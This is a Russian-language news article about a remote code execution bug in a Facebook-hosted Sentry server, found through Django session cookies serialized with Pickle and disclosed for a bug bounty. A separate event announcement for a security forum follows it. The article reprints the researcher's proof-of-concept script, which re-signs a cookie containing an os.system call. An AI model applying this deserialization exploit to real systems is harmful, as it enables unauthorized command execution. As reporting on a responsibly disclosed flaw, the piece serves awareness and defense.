Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Подписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Екатерина Быстрова 16 Сентября 2025 - 12:51

Общее Газинформсервис

Бизнес-день GIS DAYS 2025: ключевые игроки ИБ-рынка обсудят защиту ИИ

3 октября в Москве в кинотеатре «Октябрь» состоится бизнес-день форума GIS DAYS 2025*. Мероприятие, организованное компанией «Газинформсервис», соберёт на одной площадке ведущих экспертов, представителей государственных органов и топ-менеджмент крупнейших ИТ- и ИБ-компаний для обсуждения самых актуальных вызовов цифровой эпохи.

Деловая программа дня будет сосредоточена на практических решениях для защиты бизнеса. Ключевым событием станет пленарное заседание «Как защитить искусственный интеллект».

В рамках бизнес-трека «Классика и авангард» лидеры индустрии представят кейсы интеграции машинного обучения в традиционные системы защиты. Отдельный блок будет посвящён технологиям BAS (Breach and Attack Simulation) для имитации сложных кибератак.

«Сегодня невозможно говорить о безопасности изолированно, только в контексте технологий. На GIS DAYS мы создаём среду, где стратегическое видение регуляторов встречается с практическим опытом вендоров и запросами бизнеса. Фокус на ИИ в этом году — не просто тренд, а насущная необходимость, и мы готовы предложить рынку конкретные решения», — отметил Валерий Пустарнаков, учредитель компании «Газинформсервис».

Во второй половине дня эксперты представят формат «Броня за 7 шагов» — семь последовательных шагов, от управления активами до валидации защищённости. Участники увидят, как выстроить сквозной процесс противодействия угрозам.

Завершит деловую программу масштабная дискуссия «ИБ-Пророки: 2-ой сезон», где обсудят развитие угроз и технологий защиты на ближайшие годы.

В отдельном зале пройдёт технический трек для специалистов, посвящённый безопасности цифрового будущего, круглые столы по итогам полугодия для рынка NGFW и сессия «Киберустойчивость» с докладами молодых специалистов.

Подробнее: https://gisdays.ru/?utm_source=anti-malware&utm_medium=article&erid=2Vfn...

*Global Information Security Days — дни глобальной информационной безопасности.